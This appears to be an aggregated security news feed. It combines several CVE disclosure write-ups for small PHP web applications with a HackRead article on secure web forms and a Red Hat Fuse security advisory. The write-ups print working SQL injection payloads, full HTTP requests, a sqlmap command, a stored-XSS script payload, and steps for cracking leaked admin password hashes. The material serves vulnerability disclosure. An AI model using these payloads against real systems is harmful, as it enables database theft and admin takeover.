Book Store Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.

Book Store Management System— Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access

Exploit Author: Upasana Bohra

Vendor Homepage: https://www.sourcecodester.com/php-project

Software Link: https://www.sourcecodester.com/php/15748/book-store-management-system-project-using-php-codeigniter-3-free-source-code.html

Tested on Windows10

Linkedln Contact: https://www.linkedin.com/in/upasana-bohra-8767b9156/

Hardcoded Credentials:

Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk.

\[Attack Vectors\]

An attacker can gain admin panel access using default credentials and do malicious activities

PROOF OF CONCEPT

1 Download source code from https://www.sourcecodester.com/php/15748/book-store-management-system-project-using-php-codeigniter-3-free-source-code.html

2 Now unzip it and go to the Database folder here we can see one SQL file.

3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.

CVE-2022-44097: Book Store Management System— Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access · Issue #2 · upasvi/CVE-

Sanitization Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.

Sanitization Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access

Exploit Author: Upasana Bohra

Vendor Homepage: https://www.sourcecodester.com/php-project

Software Link: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

Tested on Windows10

Linkedln Contact: https://www.linkedin.com/in/upasana-bohra-8767b9156/

Hardcoded Credentials:

Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk.

\[Attack Vectors\]

An attacker can gain admin panel access using default credentials and do malicious activities

Proof Of Concept

1 Download source code from https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

2 Now unzip it and go to the Database folder here we can see one SQL file.

3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.

CVE-2022-44096: Sanitization Management System  — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access · Issue #1 · upasvi/CVE-

Church Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/edit_members.php.

**Church Management System v1.0 by Godfrey De Blessed has SQL injection**

BUG\_Author: ZhangZhaoyue

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/11206/church-management-system.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /cman/admin/edit\_members.php?id=

Vulnerability location: /cman/admin/edit\_members.php?id=, id

dbname = cman

\[+\] Payload: /cman/admin/edit\_members.php?id=-0725873436%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15--+ // Leak place ---> id

GET /cman/admin/edit\_members.php?id\=\-0725873436%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-45328: bug_report/SQLi-1.md at main · zhangzhaoyuela/bug_report

SQL Injection in GitHub repository owncast/owncast prior to 0.0.13.

**owncast is vulnerable to SQL Injection**

Critical severity GitHub Reviewed Published Nov 29, 2022 • Updated Dec 2, 2022

GHSA-cvh4-cjc9-84qm: owncast is vulnerable to SQL Injection

CVE-2022-3751: huntr – Security Bounties for any GitHub repository

Garage Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /garage/php_action/createBrand.php.

Permalink

Cannot retrieve contributors at this time

**Title: Garage Management System 1.0 Stored Cross-Site Scripting****Author: tpaer****Date: 07.22.2022****Vendor:**

https://www.sourcecodester.com/users/mayurik

**Software:**

https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

#Description： #The Line 10 of createBrand.php sends unvalidated data to a web browser, which can result in the browser executing malicious code

#echo $createBrand->brandName;

#POC:

POST /garage/php\_action/createBrand.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/garage/add-brand.php
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------259114429803
Content-Length: 472
\-----------------------------259114429803
Content-Disposition: form-data; name="currnt\_date"
\-----------------------------259114429803
Content-Disposition: form-data; name="brandName"
hello(><script>alert(/test/)</script>
\-----------------------------259114429803
Content-Disposition: form-data; name="brandStatus"
1
\-----------------------------259114429803
Content-Disposition: form-data; name="create"
\-----------------------------259114429803--

CVE-2022-44279: bug_report/xss1.md at main · Onetpaer/bug_report

By Waqas
Ensuring that the forms you – or your clients – use to send and receive information via your…
This is a post from HackRead.com Read the original post: Crucial Tips for Secure Form Submissions

Ensuring that the forms you – or your clients – use to send and receive information via your website are secured are vital. Users are more aware than ever before of data security and expect the highest level of security as a standard. If your website can’t deliver on this, you’re unlikely ever to achieve the conversion rate you’d like.

Want some stats? 95% of customers have stopped buying from a company due to **data** **privacy concerns**. More than half of privacy-active users have already switched to another company to provide products and services due to their data policies. All this means, in essence, that not having every element of your site watertight is likely to cost you, customers.

So-  here are the tips and hacks you need to know to ensure you’re deploying **secure form** submissions.

**Use a High-Quality Editor**

Firstly, the basics: you need the right tools to get the job done when creating your secure form. Opt for a rich text editor that’s reliable, offers a range of stylistic functions, and can integrate with your other online security processes.

Consider an option like the **TinyMCE rich text editor**, which allows your developers complete control over the development process and boasts advanced tools and features that are accessible and easy to get started with and maintain.

**Limit User Input**

Use field validation tools whenever you create a secure form to prevent would-be hackers from identifying vulnerabilities by entering random data into form fields.

Field validation tools mean, for example, that only numbers can be entered into a field asking for a user’s telephone number.

**Ditch Detailed Error Messages**

Detailed error messages may be helpful to users, right? In most instances, this isn’t the case – but it certainly IS the case when it comes to hackers, who are likely to find a detailed message very useful indeed.

This is how: if a hacker tries to gain access and enters a username and password and gets an error message back along the lines of ‘incorrect password,’ they’ll know they’ve hit the nail on the head in terms of the username.

Make a hacker work harder; in the above scenario, a generic error message like ‘incorrect login information will give them a headache instead of an easier ride.

**Assess File Upload Security**

Look carefully at how users can upload files to check for vulnerabilities in the system. Think specifically about **how a cybercriminal** could try to use the upload facility to attack your site by uploading a file containing a virus, bug, or other malicious software.

You can take several steps to prevent this and improve security on this score. Firstly, restrict the type of file extensions allowed and limit the size of files that can be uploaded. Secondly, train staff to analyze uploaded files before opening and using them, and isolate uploaded files within your network as much as possible to limit the damage a rogue file could cause to your systems.

**Use Encryption**

**Encrypting data makes it unreadable** to those who don’t have the key – meaning that even if hackers crack it, all they’ll have will be unintelligible pieces of code. To this end, use HTTPS to provide multiple layers of protection. As well as ensuring that your customers’ browsing and online activity can’t be snooped on, HTTPS also prevents data from being modified or corrupted during transfer – without you knowing anything about it.

Finally, the authentication processes built into HTTPS ensure that all the parties exchanging data over the connection are who they claim to be.

**Consider 3DS**

To add enhanced security for form submissions relating to payments, incorporate 3DS (**3D Secure**). This technology requires customers to undertake an additional verification step with their card issuer by redirecting these customers to a dedicated authentication page on their bank’s website. Here, they’ll be asked to prove their identity by entering a unique password and a PIN or SMS code.

In some countries, using 3DS to take payments is mandatory, while in others, it’s optional. To maintain the highest level of security in your form submissions, putting it in place is recommended.

**Guard Against Cross-Site Scripting Attacks**

Cross-site scripting (**XSS**) is one of scammers’ most frequently used cyber-attacks. This type of attack involves a hacker inserting data (like a malicious script) into the content of a trusted website. This compromised content is subsequently delivered to the user’s browser.

Escaping user data in a secure form is one of the most effective ways to guard against cross-site scripting attacks. Escaping means ensuring that the data received contains no executable script before rendering it for the user.

**The Takeaway**

Use the tips and hacks above to optimize your secure form submission processes, and have peace of mind that the data of your users, and your business, is safe. When approaching the creation of secure forms, always think of the ways that hackers could try to attack and the routes they may target to identify vulnerabilities – and then plug the gaps.

Security and data privacy concerns are paramount for today’s consumers – creating the most secure forms possible is vital to strengthen your business’s position in the market.

1.  **Best Data Science Tools in 2020**
2.  **How to Create ISO Files from Discs – 3 Best Ways**
3.  **How to configure cPanel and WHM Panel on your VPS**
4.  **MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries**
5.  **How to Craft Rich Data-Driven Infographics with Powered Template**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Crucial Tips for Secure Form Submissions

Red Hat Security Advisory 2022-8652-01 - This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include bypass, cross site scripting, denial of service, remote SQL injection, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Fuse 7.11.1 release and security update  
Advisory ID:       RHSA-2022:8652-01  
Product:           Red Hat JBoss Fuse  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8652  
Issue date:        2022-11-28  
CVE Names:         CVE-2019-8331 CVE-2021-3717 CVE-2021-31684  
                   CVE-2021-44906 CVE-2022-0613 CVE-2022-2048  
                   CVE-2022-2053 CVE-2022-24723 CVE-2022-24785  
                   CVE-2022-24823 CVE-2022-25857 CVE-2022-31129  
                   CVE-2022-31197 CVE-2022-33980 CVE-2022-38749  
                   CVE-2022-41853 CVE-2022-42889  
====================================================================  
1. Summary:

A minor version update (from 7.11 to 7.11.1) is now available for Red Hat  
Fuse. The purpose of this text-only errata is to inform you about the  
security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat  
Fuse 7.11 and includes bug fixes and enhancements, which are documented in  
the Release Notes document linked in the References.

Security Fix(es):

* hsqldb: Untrusted input may lead to RCE attack [fuse-7] (CVE-2022-41853)

* io.hawt-hawtio-online: bootstrap: XSS in the tooltip or popover  
data-template attribute [fuse-7] (CVE-2019-8331)

* io.hawt-project: bootstrap: XSS in the tooltip or popover data-template  
attribute [fuse-7] (CVE-2019-8331)

* wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving  
access to all the local users [fuse-7] (CVE-2021-3717)

* json-smart: Denial of Service in JSONParserByteArray function [fuse-7]  
(CVE-2021-31684)

* io.hawt-hawtio-integration: minimist: prototype pollution [fuse-7]  
(CVE-2021-44906)

* urijs: Authorization Bypass Through User-Controlled Key [fuse-7]  
(CVE-2022-0613)

* http2-server: Invalid HTTP/2 requests cause DoS [fuse-7] (CVE-2022-2048)

* snakeyaml: Denial of Service due to missing nested depth limitation for  
collections [fuse-7] (CVE-2022-25857)

* urijs: Leading white space bypasses protocol validation [fuse-7]  
(CVE-2022-24723)

* Moment.js: Path traversal in moment.locale [fuse-7] (CVE-2022-24785)

* netty: world readable temporary file containing sensitive data [fuse-7]  
(CVE-2022-24823)

* jdbc-postgresql: postgresql: SQL Injection in ResultSet.refreshRow() with  
malicious column names [fuse-7] (CVE-2022-31197)

* commons-configuration2: apache-commons-configuration: Apache Commons  
Configuration insecure interpolation defaults [fuse-7] (CVE-2022-33980)

* commons-text: apache-commons-text: variable interpolation RCE [fuse-7]  
(CVE-2022-42889)

* undertow: Large AJP request may cause DoS [fuse-7] (CVE-2022-2053)

* moment: inefficient parsing algorithm resulting in DoS [fuse-7]  
(CVE-2022-31129)

* snakeyaml: Uncaught exception in  
org.yaml.snakeyaml.composer.Composer.composeSequenceNode [fuse-7]  
(CVE-2022-38749)

For more details about the security issues, including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

Installation instructions are available from the Fuse 7.11.1 product  
documentation page:  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/

4. Bugs fixed (https://bugzilla.redhat.com/):

1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute  
1991305 - CVE-2021-3717 wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving access to all the local users  
2055496 - CVE-2022-0613 urijs: Authorization Bypass Through User-Controlled Key  
2062370 - CVE-2022-24723 urijs: Leading white space bypasses protocol validation  
2066009 - CVE-2021-44906 minimist: prototype pollution  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data  
2095862 - CVE-2022-2053 undertow: Large AJP request may cause DoS  
2102695 - CVE-2021-31684 json-smart: Denial of Service in JSONParserByteArray function  
2105067 - CVE-2022-33980 apache-commons-configuration: Apache Commons Configuration insecure interpolation defaults  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2116952 - CVE-2022-2048 http2-server: Invalid HTTP/2 requests cause DoS  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2129428 - CVE-2022-31197 postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names  
2129706 - CVE-2022-38749 snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode  
2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE  
2136141 - CVE-2022-41853 hsqldb: Untrusted input may lead to RCE attack

5. References:

https://access.redhat.com/security/cve/CVE-2019-8331  
https://access.redhat.com/security/cve/CVE-2021-3717  
https://access.redhat.com/security/cve/CVE-2021-31684  
https://access.redhat.com/security/cve/CVE-2021-44906  
https://access.redhat.com/security/cve/CVE-2022-0613  
https://access.redhat.com/security/cve/CVE-2022-2048  
https://access.redhat.com/security/cve/CVE-2022-2053  
https://access.redhat.com/security/cve/CVE-2022-24723  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-24823  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-31197  
https://access.redhat.com/security/cve/CVE-2022-33980  
https://access.redhat.com/security/cve/CVE-2022-38749  
https://access.redhat.com/security/cve/CVE-2022-41853  
https://access.redhat.com/security/cve/CVE-2022-42889  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4UEJdzjgjWX9erEAQg9jw//bHEzcxXGN9kNp1msJRaz6iQEu7dv9TYV  
N1lsrfJEc/fosdjIilTzia9hKhMVvbC6iv6lWGc6s3E9t48vGdSYLHbh+qHnFo7t  
WtrjZnejl53WYwRc70oyeUmXTNrrd9iuATkvkFF6MA024hcJFksuiHmF5/Awa9T8  
sSsLbm5eutvBz1rBDGgcq4fDCFB40YmKsLKhzHrV0SpeZKTCgwNyzvpAVVlsxXhk  
OSSCmda+ZTxkA9+gaTsJqqeBeDgHhSL+PVzWOYuRM6wT49tkwSJHfBs9EgV55IjE  
IVOQm3oGUyMSGBjbbiD8NuYEQkAip8AK0eTIQbaWW4n9geXpw5VOh/E3U8u+a9xY  
h0pAs6ACta+fD3d9hSabTkDDno6NU94bcmKh2rfpNvj6h9UX0Ca0lKMZ25t6zUln  
2OHzLhilUnbOSwnE709NBaEaI4t/aev1TBpeZ1KFpn/6Mdbx6pvjuh76kCHwdg7o  
OVsrvplG6hJ93S5vNNYxwfcL7TFNyWBcHR0Em7D51zZ87HkzYcNh9Ay481BgXGz+  
z2N71zc+h0auaMo5bnL68hMSjFmhiMWZmfy1H8w2Sz6fol8iO/aYI/ddv/8aYP1k  
3ZMY7ygpkvcryPaz7VKixbX7yZNOI2gfXl2zDSvIoOjaajND4ctdidxJ9MeZYj6r  
WzRyyCDzfVo=IsTh  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8652-01

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.

**Step to Reproduct**

*   The search parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The search parameter is passed in the POST mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    "SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'"
    

**POC**

*   Injection Point

    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
    

*   Request

    POST /AeroCMS-0.0.1/search.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163
    Connection: close
    
    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=

CVE-2022-45329: CVE/search_sql_injection.md at master · rdyx0/CVE

Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.

**Vulnerability Explanation:**

Online-shopping-system-advanced was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php

**Affected Component:**

http://\[ip\]/shopping/product.php?p=72

**Payload:**

Parameter: p (GET)  
    Type: UNION query  
    Title: Generic UNION query (NULL) - 8 columns  
    Payload: p=72 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a6271,0x61644f4c796848674f74444476795064457842697a416649624d78546f4152624f78644a77446867,0x7170707071),NULL,NULL,NULL,NULL-- -

**Tested on:**

1.  Online-shopping-system-advanced

https://github.com/PuneethReddyHC/online-shopping-system-advanced

**Steps to attack:**

1.  Go to the mainpage and click on head-phone product.

4\. We’ll found /shopping/product.php?p=72

5.Using sqlmap with our URL by the following the command below:

sqlmap -u "http://\[IP\]/shopping/product.php?p=72" --batch --threads 10 --technique U --dbs

6\. We discovered SQL injection vulnerability via the p parameter.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://github.com/PuneethReddyHC/online-shopping-system-advanced

Tag

#sql